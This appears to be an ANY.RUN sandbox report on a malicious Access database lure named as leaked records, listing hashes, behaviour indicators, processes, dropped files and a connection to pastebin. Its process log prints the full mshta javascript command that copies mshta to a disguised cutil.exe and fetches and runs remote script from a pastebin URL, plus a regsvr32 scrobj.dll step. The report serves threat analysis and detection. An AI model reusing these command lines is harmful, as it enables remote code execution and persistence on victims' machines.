analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Leaked_Records_15072019_Col.accdb

Full analysis: https://app.any.run/tasks/0cf1b497-8ce2-4b5a-9656-6faab4a4f48e
Verdict: Malicious activity
Analysis date: July 17, 2019, 13:56:13
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: application/x-msaccess
File info: Microsoft Access Database
MD5:

BEFC603B7E59E0B739AE150FFC0CAD3A

SHA1:

4BF499C320E6806E877E68876A3BEB2ADA2A45AC

SHA256:

7C02D2F27147C49030C0619D1D313CFA24234F789E149B2E3D1478400496A32C

SSDEEP:

1536:DAQxNqc6lh3WHzVdGduAixBQdpdzdmdudJ:DAQxNqc6lsfkuAixAjJEcJ

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Unusual execution from Microsoft Office

      • MSACCESS.EXE (PID: 2296)

    • Application was dropped or rewritten from another process

      • mshta.exe (PID: 3620)
      • cutil.exe (PID: 2064)

    • Changes the autorun value in the registry

      • cutil.exe (PID: 2064)

  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • mshta.exe (PID: 3620)
      • cutil.exe (PID: 2064)

    • Starts Microsoft Office Application

      • rundll32.exe (PID: 3704)

    • Starts itself from another location

      • mshta.exe (PID: 3620)

    • Creates files in the user directory

      • MSACCESS.EXE (PID: 2296)
      • cutil.exe (PID: 2064)

    • Starts MSHTA.EXE for opening HTA or HTMLS files

      • MSACCESS.EXE (PID: 2296)

    • Reads internet explorer settings

      • cutil.exe (PID: 2064)

  • INFO

    • Reads internet explorer settings

      • mshta.exe (PID: 3620)

    • Reads Microsoft Office registry keys

      • MSACCESS.EXE (PID: 2296)

    • Reads settings of System Certificates

      • cutil.exe (PID: 2064)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.accdb | Microsoft Access 2007 Database (90.4)
.pi2 | DEGAS med-res bitmap (9.5)
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
41
Monitored processes
5
Malicious processes
2
Suspicious processes
2

Behavior graph

Click at the process to see the details
start drop and start rundll32.exe no specs msaccess.exe mshta.exe cutil.exe regsvr32.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3704"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\admin\Desktop\Leaked_Records_15072019_Col.accdbC:\Windows\system32\rundll32.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows host process (Rundll32)
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2296"C:\Program Files\Microsoft Office\Office14\MSACCESS.EXE" /NOSTARTUP "C:\Users\admin\Desktop\Leaked_Records_15072019_Col.accdb" C:\Program Files\Microsoft Office\Office14\MSACCESS.EXE
rundll32.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Access
Exit code:
0
Version:
14.0.6024.1000
3620"C:\Windows\System32\mshta.exe" javascript:eval(new%20ActiveXObject("Scripting.FileSystemObject").CopyFile%20("c:\\windows\\system32\\mshta.exe",%20new%20ActiveXObject("Wscript.Shell").ExpandEnvironmentStrings("%25userprofile%25")+"\\AppData\\Local\\Microsoft\\cutil.exe"));eval(new%20ActiveXObject("Wscript.Shell").Run(new%20ActiveXObject("Wscript.Shell").ExpandEnvironmentStrings("%25userprofile%25")+"\\AppData\\Local\\Microsoft\\cutil%20javascript:eval(a=GetObject('script:https://pastebin.com/raw/viwSRB6M'));close();"));close();C:\Windows\System32\mshta.exe
MSACCESS.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
2064"C:\Users\admin\AppData\Local\Microsoft\cutil.exe" javascript:eval(a=GetObject('script:https://pastebin.com/raw/viwSRB6M'));close();C:\Users\admin\AppData\Local\Microsoft\cutil.exe
mshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3588"C:\Windows\System32\regsvr32.exe" /u /n /s /i:C:\Users\admin\AppData\Local\logs.tmp scrobj.dllC:\Windows\System32\regsvr32.executil.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft(C) Register Server
Exit code:
5
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 424
Read events
1 285
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
0
Text files
4
Unknown types
4

Dropped files

PID
Process
Filename
Type
2296MSACCESS.EXEC:\Users\admin\AppData\Local\Temp\CVRF6D.tmp.cvr
MD5:
SHA256:
2296MSACCESS.EXEC:\Users\admin\AppData\Local\Temp\~DF1D1212693DF4D212.TMP
MD5:
SHA256:
2296MSACCESS.EXEC:\Users\admin\Desktop\Leaked_Records_15072019_Col.laccdb
MD5:
SHA256:
2296MSACCESS.EXEC:\Users\admin\AppData\Roaming\Microsoft\Access\System.ldb
MD5:
SHA256:
2296MSACCESS.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\Leaked_Records_15072019_Col.accdb.LNKlnk
MD5:77923180D16AEB9F018769FAE5E86513
SHA256:CD2752DEA7C9DDCCC358B7CDB2AA0ED68E8A4CF607E16D1D483028926F3E8EB4
2296MSACCESS.EXEC:\Users\admin\AppData\Roaming\Microsoft\Access\System.mdwmdw
MD5:7304E00D382D4624140D92952F8BB219
SHA256:D65513DB2DFAB8495CFBF35A24D89CB5A8274B7519DB5C9AB6FA5FAE565E8E56
2064cutil.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JGRR2OYX\viwSRB6M[1].txtxml
MD5:3739532BDF9B523E245EEEDD062AB5FF
SHA256:544C113236191E588D7679CB9168C5D45A8D4736B5D08217BE1C66DED4F468F3
2064cutil.exeC:\Users\admin\AppData\Local\temp.tmpexecutable
MD5:91456160503D1965136BBE939606878E
SHA256:350CDEC0802FB24B9AA93CF44C318DCC12BBAF2D85B0E43D0142C54690A18138
2296MSACCESS.EXEC:\Users\admin\AppData\Local\Temp\Database.lnklnk
MD5:31AEFA424BD036B40F8B9B64C1C9F78F
SHA256:67106A3278F63805F941D515BE4A40EA1DB3F0D926A4C9A8C71376F10E5EED26
2064cutil.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@pastebin[1].txttext
MD5:C939488752FEF70DDE2977B4E5F4D58F
SHA256:3D9EA4BAF4FF97B12C959D2D81776DC96F1E181F5878008BEA28E3D4C9F49656
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
1
DNS requests
1
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2064
cutil.exe
104.20.209.21:443
pastebin.com
Cloudflare Inc
US
shared

DNS requests

Domain
IP
Reputation
pastebin.com
  • 104.20.209.21
  • 104.20.208.21
shared

Threats

No threats detected
Process
Message
MSACCESS.EXE
C:\Users\admin\AppData\Roaming\Microsoft\Access\System.mdw
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
Leaked_Records_15072019_Col.accdb